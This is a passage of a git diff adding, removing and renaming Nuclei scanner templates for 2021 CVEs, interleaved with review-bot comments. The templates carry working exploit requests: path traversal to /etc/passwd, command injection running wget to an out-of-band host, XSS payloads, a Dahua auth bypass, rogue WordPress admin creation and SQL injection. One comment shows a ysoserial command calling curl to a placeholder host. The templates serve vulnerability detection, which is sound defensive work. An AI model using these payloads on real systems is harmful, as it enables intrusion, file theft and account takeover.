@@ -1,34 +0,0 @@ -id: CVE-2021-3223 - -info: - name: Node RED Dashboard - Directory Traversal - author: gy741,pikpikcu - severity: high - description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. - reference: - - https://github.com/node-red/node-red-dashboard/issues/669 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-3223 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - - matchers-condition: or - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: word - part: body - words: - - "Node-RED web server is listening" diff --git a/nuclei-templates/CVE-2021/cve-2021-32305.yaml b/nuclei-templates/CVE-2021/cve-2021-32305.yaml new file mode 100644 index 0000000000..45fb64b4ce --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-32305.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2021-32305 + +info: + name: Websvn <2.6.1 - Remote Code Execution + author: gy741 + severity: critical + description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + reference: + - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://github.com/websvnphp/websvn/pull/142 + - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 + tags: cve,cve2021,websvn,rce,oast + +requests: + - raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-32853.yaml b/nuclei-templates/CVE-2021/cve-2021-32853.yaml new file mode 100644 index 0000000000..3bc5300c3d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-32853.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2021-32853 + +info: + name: Erxes <= v0.23.0 XSS + author: dwisiswant0 + severity: medium + description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 + classification: + cve-id: CVE-2021-32853 + metadata: + shodan-query: http.title:"erxes" + tags: cve,cve2021,xss,erxes,oss + +requests: + - method: GET + path: + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'topic_id: "' + - "window.erxesEnv" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3293.yaml b/nuclei-templates/CVE-2021/cve-2021-3293.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3293.yaml rename to nuclei-templates/CVE-2021/cve-2021-3293.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/cve-2021-33044.yaml new file mode 100644 index 0000000000..09217ac1d6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33044.yaml 
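Review bot: The NVD reference reads `https://nvd.nist.gov/vuln/detail/CVE-2021-3285`, which drops the last two digits and points at a different CVE record than the `cve-id: CVE-2021-32853` declared just below. Change it to `- https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. The `classification` block also has no `cvss-metrics`, `cvss-score` or `cwe-id`, unlike the other templates here, so reports built from those fields will show this finding without a score.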
@@ -0,0 +1,55 @@ +id: CVE-2021-33044 + +info: + name: Dahua IPC/VTH/VTO devices Authentication Bypass + author: gy741 + severity: critical + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + reference: + - https://github.com/dorkerdevil/CVE-2021-33044 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 + - https://seclists.org/fulldisclosure/2021/Oct/13 + - https://www.dahuasecurity.com/support/cybersecurity/details/957 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-33044 + cwe-id: CWE-287 + tags: dahua,cve,cve2021,auth-bypass + +requests: + - raw: + - | + POST /RPC2_Login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Connection: close + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"result":true' + - 'id' + - 'params' + - 'session' + condition: and + + extractors: + - type: regex + group: 1 + part: body + regex: + - ',"result":true,"session":"([a-z]+)"\}' diff --git a/nuclei-templates/CVE-2021/cve-2021-33221.yaml b/nuclei-templates/CVE-2021/cve-2021-33221.yaml new file mode 100644 index 0000000000..3b6825a4ed --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33221.yaml 
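Review bot: The `extractors` block captures the `session` value returned by a successful `global.login`, and extracted values are printed with the finding. Every hit therefore writes a live device session identifier into scan output and into any report or ticket it is copied to. The `"result":true` matcher already proves the bypass, so drop the extractor or mark it `internal: true` to keep the value out of the results. Separately, the words `'id'`, `'params'` and `'session'` are generic enough that they add little beyond `"result":true`.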
@@ -0,0 +1,43 @@ +id: CVE-2021-33221 + +info: + name: CommScope Ruckus IoT Controller - Information Disclosure + author: geeknik + severity: critical + description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + reference: + - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf + - http://seclists.org/fulldisclosure/2021/May/72 + - https://korelogic.com/advisories.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 + tags: cve,cve2021,commscope,ruckus,debug,service,leak + +requests: + - method: GET + path: + - "{{BaseURL}}/service/v1/service-details" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - type: word + words: + - "message" + - "ok" + - "data" + - "dns" + - "gateway" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-3377.yaml b/nuclei-templates/CVE-2021/cve-2021-3377.yaml new file mode 100644 index 0000000000..bceb482946 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-3377.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2021-3377 + +info: + name: npm ansi_up v4 - Cross-Site Scripting + author: geeknik + severity: medium + description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. + reference: + - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf + - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 + - https://nvd.nist.gov/vuln/detail/CVE-2021-3377 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 + remediation: Upgrade to v5.0.0 or later. + tags: cve,cve2021,xss,npm + +requests: + - raw: + - |+ + GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 + Host: {{Hostname}} + Connection: close + + unsafe: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "com\"/onmouseover=\"alert(1)\">" + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/cve-2021-33904.yaml b/nuclei-templates/CVE-2021/cve-2021-33904.yaml new file mode 100644 index 0000000000..331900d021 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-33904.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2021-33904 + +info: + name: Accela Civic Platform 21.1 - 'servProvCode' XSS + author: geeknik + severity: medium + description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS. + reference: + - https://www.exploit-db.com/exploits/49980 + - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21 + - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 + tags: cve,cve2021,accela,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"' + - 'servProvCode' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-34473.yaml b/nuclei-templates/CVE-2021/cve-2021-34473.yaml new file mode 100644 index 0000000000..e86d9b44c6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34473.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2021-34473 + +info: + name: Exchange Server - Remote Code Execution + author: arcc,intx0x80,dwisiswant0,r3dg33k + severity: critical + description: | + Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + reference: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 + remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-34473 + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - method: GET + path: + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' + + matchers: + - type: word + part: body + condition: or + words: + - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" + - "Exchange MAPI/HTTP Connectivity Endpoint" + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-34621.yaml b/nuclei-templates/CVE-2021/cve-2021-34621.yaml new file mode 100644 index 0000000000..1cf1c27f69 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34621.yaml 
@@ -0,0 +1,112 @@ +id: CVE-2021-34621 + +info: + name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness + author: 0xsapra + severity: critical + description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator. + reference: + - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin + - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 + - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/ + - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + tags: cve,cve2021,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_username" + + {{randstr}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_email" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_password_present" + + true + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_first_name" + + {{randstr}}@example.com + 
-----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="reg_last_name" + + {{randstr}}@example.com + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="_wp_http_referer" + + /wp/?page_id=18 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="pp_current_url" + + {{BaseURL}} + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="wp_capabilities[administrator]" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_form_id" + + 1 + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="signup_referrer_page" + + + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="action" + + pp_ajax_signup + -----------------------------138742543134772812001999326589 + Content-Disposition: form-data; name="melange_id" + + + -----------------------------138742543134772812001999326589-- + + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In + + - | + GET /wp-admin/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to your WordPress Dashboard" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-34640.yaml b/nuclei-templates/CVE-2021/cve-2021-34640.yaml new file mode 100644 index 0000000000..f56d7fe0d5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34640.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2021-34640 + +info: + name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4. + reference: + - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 + - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34640 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET //wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-34805.yaml b/nuclei-templates/CVE-2021/cve-2021-34805.yaml new file mode 100644 index 0000000000..2ba871728e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34805.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2021-34805 + +info: + name: FAUST iServer 9.0.018.018.4 - Local File Inclusion + author: 0x_Akoko + severity: high + description: An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal. + reference: + - https://cxsecurity.com/issue/WLB-2022010120 + - https://www.cvedetails.com/cve/CVE-2021-34805 + - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html + - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-34805 + cwe-id: CWE-22 + tags: cve,cve2021,faust,iserver,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-35464.yaml b/nuclei-templates/CVE-2021/cve-2021-35464.yaml new file mode 100644 index 0000000000..f71ba6c55b --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-35464.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2021-35464 + +info: + name: ForgeRock OpenAM <7.0 - Remote Code Execution + author: madrobot + severity: critical + description: | + ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. + The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted + /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) + found in versions of Java 8 or earlier. + reference: + - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464 + - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html + - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 + tags: cve,cve2021,openam,rce,java + +requests: + - method: GET + path: + - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + + # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=' + # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Set-Cookie: JSESSIONID=" + part: header + + - type: word + words: + - "Version Information -" + - "openam/ccversion/Masthead.jsp" + part: body + condition: or + +# Enhanced by mp on 2022/05/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-36749.yaml b/nuclei-templates/CVE-2021/cve-2021-36749.yaml new file mode 100644 index 0000000000..703728a67c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-36749.yaml 
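Review bot: The matchers in CVE-2021-35464 only prove that the `ccversion/Version` page is reachable through the `..;` path (status 200, a `JSESSIONID` cookie and one of two page strings), while `info` reports the finding as critical remote code execution. No `jato.pageSession` value is sent, so a hit is an exposure indicator rather than a confirmed deserialization, and triage still needs the AM version. I would state that in a comment above the matchers, e.g. `# Detection only: confirms the ccversion page is reachable; verify the AM version (< 7.0) before rating as RCE.` The path is also fixed to the `/openam` context, so deployments under another context root are presumably missed.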
@@ -0,0 +1,36 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. 
+ reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass,druid + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or diff --git a/nuclei-templates/CVE-2021/cve-2021-37216.yaml b/nuclei-templates/CVE-2021/cve-2021-37216.yaml new file mode 100644 index 0000000000..25f31aa3fc --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37216.yaml 
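Review bot: The second regex in the CVE-2021-36749 matcher, `"druid:*:1000:1000:"`, repeats the colon instead of matching the password field, so it cannot match an ordinary passwd line such as `druid:x:1000:1000:`. It should read `- "druid:.*:1000:1000:"`, parallel to the `root:.*:0:0:` entry above it. `matchers-condition: and` has only this one matcher to combine; either drop it or add the `- type: status` check with `200` that the sibling templates in this patch use.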
@@ -0,0 +1,42 @@ +id: CVE-2021-37216 + +info: + name: QSAN Storage Manager prior to v3.3.3 Reflected XSS + author: dwisiswant0 + severity: medium + description: | + QSAN Storage Manager header page parameters does not filter special characters. + Remote attackers can inject JavaScript without logging in and launch + reflected XSS attacks to access and modify specific data. + reference: + - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 + tags: cve,cve2021,xss,qsan,storage + +requests: + - method: GET + path: + - "{{BaseURL}}/http_header.php" + headers: + X-Trigger-XSS: "" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '"HTTP_X_TRIGGER_XSS":""' + + - type: word + part: header + words: + - "text/html" + + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'x-xss-protection')" diff --git a/nuclei-templates/CVE-2021/cve-2021-37416.yaml b/nuclei-templates/CVE-2021/cve-2021-37416.yaml new file mode 100644 index 0000000000..16c783a632 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37416.yaml 
@@ -0,0 +1,45 @@ +id: CVE-2021-37416 + +info: + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + tags: cve,cve2021,zoho,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37580.yaml b/nuclei-templates/CVE-2021/cve-2021-37580.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-37580.yaml rename to nuclei-templates/CVE-2021/cve-2021-37580.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-37589.yaml b/nuclei-templates/CVE-2021/cve-2021-37589.yaml deleted file mode 100644 index b735f46aaf..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-37589.yaml +++ /dev/null 
@@ -1,62 +0,0 @@ -id: CVE-2021-37589 - -info: - name: Virtua Software Cobranca <12R - Blind SQL Injection - author: princechaddha - severity: high - description: | - Virtua Cobranca before 12R allows blind SQL injection on the login page. - reference: - - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589 - - https://www.virtuasoftware.com.br/ - - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br - - https://nvd.nist.gov/vuln/detail/CVE-2021-37589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-37589 - cwe-id: CWE-89 - metadata: - shodan-query: http.favicon.hash:876876147 - verified: "true" - tags: cve,cve2021,virtua,sqli - -requests: - - raw: - - | - POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - - | - POST /controller/login.php?acao=autenticar HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - idusuario='&idsenha=test&tipousr=Usuario - - - | - POST /controller/login.php?acao=autenticar HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - idusuario=''&idsenha=a&tipousr=Usuario - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - - type: dsl - dsl: - - 'contains(body_3, "Os parametros não estão informados corretamente")' - - 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")' - condition: or - - - type: dsl - dsl: - - "status_code_2 == 500 && status_code_3 == 200" - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-37704.yaml b/nuclei-templates/CVE-2021/cve-2021-37704.yaml new file mode 100644 index 0000000000..b5147f128a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37704.yaml 
@@ -0,0 +1,45 @@
+id: CVE-2021-37704
+
+info:
+ name: phpinfo Resource Exposure
+ author: whoever
+ severity: medium
+ description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
+ reference:
+ - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704
+ - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc
+ - https://packagist.org/packages/phpfastcache/phpfastcache
+ - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2021-37704
+ cwe-id: CWE-668
+ tags: cve,cve2021,exposure,phpfastcache,phpinfo
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
+ - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+
+ - type: status
+ status:
